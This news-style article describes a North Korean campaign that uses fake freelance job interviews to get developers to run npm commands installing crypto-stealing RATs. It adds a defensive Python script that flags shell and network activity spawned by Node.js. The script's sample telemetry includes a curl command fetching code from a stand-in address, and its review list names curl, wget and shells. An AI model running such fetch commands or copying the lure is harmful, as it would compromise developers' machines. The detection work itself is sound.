North Korean Hackers Are Targeting Freelance Developers With Fake Job Offers to Steal Crypto

A sophisticated malware campaign attributed to Nickel Alley, a threat group operating on behalf of the North Korean government, is targeting software developers on freelance platforms including Upwork and Fiverr with fake high-paying job opportunities designed to deliver crypto-stealing malware. Researchers at the Sophos Counter Threat Unit have documented the campaign's methodology in detail. The group creates fake LinkedIn company pages and coordinated GitHub accounts to build credibility, advertises tech talent and managed service solutions through generic-looking websites, and lures developers through a fabricated interview process that eventually persuades victims to download and execute malicious code. The attacks use typosquatted or compromised legitimate npm repositories, with victims instructed to run npm install and npm start commands that initiate malware delivery rather than a genuine development task.
The malware payloads used by Nickel Alley have evolved over time. The group has deployed PyLangGhost RAT through a ClickFix tactic: a fake web interface presents an error message instructing the victim to run a command locally to fix it, and that command instead triggers a chain of actions that installs the remote access trojan. A GoLang-based variant called GoLangGhost RAT was used in earlier campaigns. The primary goal appears to be cryptocurrency theft, but Sophos notes the group has explicitly planned to use initial access for supply chain compromise and corporate espionage as secondary objectives. Developers in finance and technology are at elevated risk given Nickel Alley's targeting profile, and Sophos recommends that organizations monitor command execution and network traffic originating from Node.js processes as an indicator of compromise.
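
One way to act on that monitoring recommendation, as an added example that is not from Sophos or the original article: the sketch below walks process-creation and network events and flags command execution or outbound connections that descend from a Node.js process. The event schema, the sample events, the list of child processes worth reviewing and the expected-destination list are all assumptions made for illustration.

```python
import json

# Constructed sample telemetry in a hypothetical JSON-lines schema
# (not data from the Sophos report). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = """\
{"type":"proc","pid":100,"ppid":1,"image":"bash","cmdline":"bash"}
{"type":"proc","pid":200,"ppid":100,"image":"node","cmdline":"npm start"}
{"type":"proc","pid":210,"ppid":200,"image":"sh","cmdline":"sh -c curl -s http://203.0.113.10/setup"}
{"type":"proc","pid":211,"ppid":210,"image":"curl","cmdline":"curl -s http://203.0.113.10/setup"}
{"type":"net","pid":200,"dest":"registry.npmjs.org"}
{"type":"net","pid":211,"dest":"203.0.113.10"}
{"type":"proc","pid":300,"ppid":100,"image":"curl","cmdline":"curl https://example.com"}
{"type":"net","pid":300,"dest":"example.com"}
"""

# Assumptions: which children of Node.js deserve review, and which
# destinations a build is expected to contact. Tune both per environment.
NODE_IMAGES = {"node", "node.exe"}
REVIEW_CHILDREN = {"sh", "bash", "cmd.exe", "powershell.exe", "curl", "wget", "python", "python3"}
EXPECTED_DESTS = {"registry.npmjs.org"}

def has_node_ancestor(pid, procs):
    """True if pid or any recorded ancestor is a Node.js process."""
    seen = set()
    while pid in procs and pid not in seen:  # 'seen' guards against pid loops
        seen.add(pid)
        if procs[pid]["image"] in NODE_IMAGES:
            return True
        pid = procs[pid]["ppid"]
    return False

def find_alerts(jsonl):
    """Return (kind, pid, detail) for activity descending from Node.js."""
    procs, alerts = {}, []
    for line in filter(str.strip, jsonl.splitlines()):
        ev = json.loads(line)
        if ev["type"] == "proc":
            procs[ev["pid"]] = ev
            if ev["image"] in REVIEW_CHILDREN and has_node_ancestor(ev["ppid"], procs):
                alerts.append(("exec", ev["pid"], ev["cmdline"]))
        elif ev["type"] == "net":
            if ev["dest"] not in EXPECTED_DESTS and has_node_ancestor(ev["pid"], procs):
                alerts.append(("net", ev["pid"], ev["dest"]))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

The same curl invocation launched directly from the user's shell (pid 300) is not flagged; only the lineage under the Node.js process is, which keeps the rule focused on what npm install or npm start set in motion.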
North Korean hackers are on Upwork offering fake dev jobs, so if the interview feels too good to be true it is because it ends with npm install malware dot js.